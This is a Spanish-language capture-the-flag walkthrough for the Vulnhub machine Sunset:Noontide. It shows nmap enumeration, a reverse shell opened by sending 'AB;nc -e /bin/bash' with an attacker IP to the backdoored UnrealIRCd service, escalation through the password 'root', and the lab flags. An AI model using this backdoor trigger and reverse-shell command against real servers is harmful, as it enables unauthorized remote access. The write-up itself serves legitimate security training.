[VULNHUB] Sunset:Noontide

Hoy vamos a hackear la maquina de Vulnhub llamada Sunset:Noontide. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/sunset-noontide,531/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~ > nmap -A 192.168.1.66 Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-07 19:27 CEST Nmap scan report for 192.168.1.66 Host is up (0.00069s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 6667/tcp open irc UnrealIRCd (Admin email example@example.com) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 0.82 seconds
    Vemos que solo tiene 1 puerto abierto y se trata del 6667 donde esta corriendo UnrealIRCd. Buscamos si hay algun exploit y encontramos[1]. Tras ver el exploit, vemos que podemos realizar la "explotacion" a mano sin necesidad de exploit.
  • Exploitation
  • Ponemos nc a la escucha...
    ~ > nc -nlvp 4444 listening on [any] 4444 ...
    Usamos nc para conectarnos al server IRC, y una vez conectados deberemos poner AB;payload\n donde reemplazaremos "payload" por un comando para que nos de una reverse shell.
    ~ > nc 192.168.1.66 6667 :irc.foonet.com NOTICE AUTH :*** Looking up your hostname... AB;nc -e /bin/bash 192.168.1.59 4444\n :irc.foonet.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
  • Low Shell
  • Obtenemos nuestra shell :)
    ~ > nc -nlvp 4444 listening on [any] 4444 ... connect to [192.168.1.59] from (UNKNOWN) [192.168.1.66] 55528 id uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev) ,109(netdev),111(bluetooth) python3 -c 'import pty;pty.spawn("/bin/bash")' server@noontide:~/irc/Unreal3.2$ id uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev) ,109(netdev),111(bluetooth) server@noontide:~/irc/Unreal3.2$
  • local.txt
  • Una vez dentro, buscamos la flag de user...
    server@noontide:~/irc/Unreal3.2$ cd /home server@noontide:/home$ ls server server@noontide:/home$ cd server server@noontide:~$ ls irc local.txt server@noontide:~$ cat local.txt c53c08b5bf2b0801c5d0c24149826a6e
  • Privilege Escalation
  • Tras explorar el sistema, empezamos por probar lo "facil" y resulta que funciona :)
    server@noontide:~$ su root Password: root
  • root.txt
  • Ya como root, miramos la flag!
    root@noontide:/home/server# cd /root root@noontide:~# ls proof.txt root@noontide:~# cat proof.txt ab28c8ca8da1b9ffc2d702ac54221105 Thanks for playing! - Felipe Winsnes (@whitecr0wz)
  • End
  • Y con esto ya seriamos root de la maquina. [1] https://www.exploit-db.com/exploits/13853